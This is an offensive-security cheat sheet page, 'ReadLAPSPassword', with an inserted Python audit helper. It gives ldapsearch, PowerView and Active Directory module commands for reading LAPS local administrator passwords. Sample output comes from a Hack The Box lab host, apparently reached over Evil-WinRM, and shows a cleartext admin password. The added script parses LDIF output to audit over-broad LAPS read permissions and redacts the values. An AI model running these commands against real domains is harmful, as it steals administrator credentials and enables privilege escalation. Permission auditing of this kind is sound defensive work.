TLDRBins / ReadLAPSPassword



Abuse #1: Read LAPS Password

ldapsearch -H ldap://<TARGET> -b 'DC=<EXAMPLE>,DC=<COM>' -x -D <USER>@<DOMAIN> -w '<PASSWORD>' '(ms-MCS-AdmPwd=*)' ms-MCS-AdmPwd
Sample Output:
$ ldapsearch -H ldap://10.10.10.240 -b 'DC=LicorDeBellota,DC=HTB' -x -D bob@LicorDeBellota.htb -w 'Test1234!@' '(ms-MCS-AdmPwd=*)' ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <DC=LicorDeBellota,DC=HTB> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd
#

# PIVOTAPI, Domain Controllers, LicorDeBellota.htb
dn: CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
ms-Mcs-AdmPwd: 2Vf5kP4Xvj5r605V616x

# search reference
ref: ldap://ForestDnsZones.LicorDeBellota.htb/DC=ForestDnsZones,DC=LicorDeBell
 ota,DC=htb

# search reference
ref: ldap://DomainDnsZones.LicorDeBellota.htb/DC=DomainDnsZones,DC=LicorDeBell
 ota,DC=htb

# search reference
ref: ldap://LicorDeBellota.htb/CN=Configuration,DC=LicorDeBellota,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3
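The same query is also the quickest LAPS permission audit: run it as an ordinary, non-admin test account and every entry that comes back is a computer whose local administrator password that account should not be able to read. The script below is an added example (not part of the TLDRBins page) that parses ldapsearch's LDIF output, including the folded continuation lines visible in the sample above, and reports which computer objects exposed ms-Mcs-AdmPwd without ever printing the password itself. The embedded LDIF is constructed from the page's sample output; the function names are this example's own.

```python
"""Audit helper: parse ldapsearch LDIF output and report which computer
objects returned a readable ms-Mcs-AdmPwd value.

Added example, not part of the TLDRBins page. Run the page's ldapsearch
query as a low-privileged test account and feed its output to this script:
every entry listed is a computer whose LAPS password that account can read,
which is what you compare against the admin groups that are meant to hold
that right. Password values are never printed, only their presence and length.
"""
import base64
from typing import Dict, Iterator, List, Tuple

# Constructed sample: the ldapsearch output from the page, with LDIF line
# folding (continuation lines start with a single space) kept intact.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=LicorDeBellota,DC=HTB> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd
#

# PIVOTAPI, Domain Controllers, LicorDeBellota.htb
dn: CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
ms-Mcs-AdmPwd: 2Vf5kP4Xvj5r605V616x

# search reference
ref: ldap://ForestDnsZones.LicorDeBellota.htb/DC=ForestDnsZones,DC=LicorDeBell
 ota,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3
"""


def unfold(text: str) -> List[str]:
    """Join LDIF continuation lines (leading space) back onto the previous line."""
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> Iterator[Dict[str, List[str]]]:
    """Yield one attribute map per LDIF record that carries a dn.

    Comment lines are skipped; records without a dn (search references,
    the result trailer) are dropped. Attribute names are lower-cased so the
    ms-MCS-AdmPwd / ms-Mcs-AdmPwd spelling difference does not matter.
    """
    record: Dict[str, List[str]] = {}
    for line in unfold(text) + [""]:       # trailing "" flushes the last record
        if line == "":
            if "dn" in record:
                yield record
            record = {}
            continue
        if line.startswith("#"):
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        value = value.strip()
        if value.startswith(":"):          # "attr:: <base64>" form of LDIF
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        record.setdefault(key.strip().lower(), []).append(value)


def laps_exposure(text: str) -> List[Tuple[str, int]]:
    """Return (dn, password_length) for every record exposing ms-Mcs-AdmPwd."""
    found: List[Tuple[str, int]] = []
    for rec in parse_ldif(text):
        pwds = rec.get("ms-mcs-admpwd", [])
        if pwds:
            found.append((rec["dn"][0], len(pwds[0])))
    return found


if __name__ == "__main__":
    hits = laps_exposure(SAMPLE_LDIF)
    print(f"{len(hits)} computer object(s) expose ms-Mcs-AdmPwd to this account")
    for dn, length in hits:
        print(f"  {dn}  (password readable, {length} chars, value redacted)")
```

Any non-empty report from a non-admin account means the ms-Mcs-AdmPwd ACE on that OU or computer is wider than intended and should be reviewed; an empty report from a test account that is supposed to have the right is the opposite misconfiguration.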

1. Import PowerView

. .\PowerView.ps1
Sample Output: *Evil-WinRM* PS C:\Users\bob\Documents> . .\PowerView.ps1

2. Create a cred object (runas) [optional]

$username = '<DOMAIN>\<USER>'
Sample Output: TO-DO
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output: TO-DO
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $password
Sample Output: TO-DO

3. Read LAPS password

Get-DomainComputer <TARGET_COMPUTER> -Properties ms-Mcs-AdmPwd
Sample Output: TO-DO
# Or Active Directory Module
Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd -Credential $cred
Sample Output:
*Evil-WinRM* PS C:\Users\bob\Documents> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd

DistinguishedName : CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
DNSHostName       : PivotAPI.LicorDeBellota.htb
Enabled           : True
ms-Mcs-AdmPwd     : 2Vf5kP4Xvj5r605V616x
Name              : PIVOTAPI
ObjectClass       : computer
ObjectGUID        : 98783674-e6a3-4d9e-87e3-efe5f31fabbf
SamAccountName    : PIVOTAPI$
SID               : S-1-5-21-842165252-2479896602-2762773115-1004
UserPrincipalName :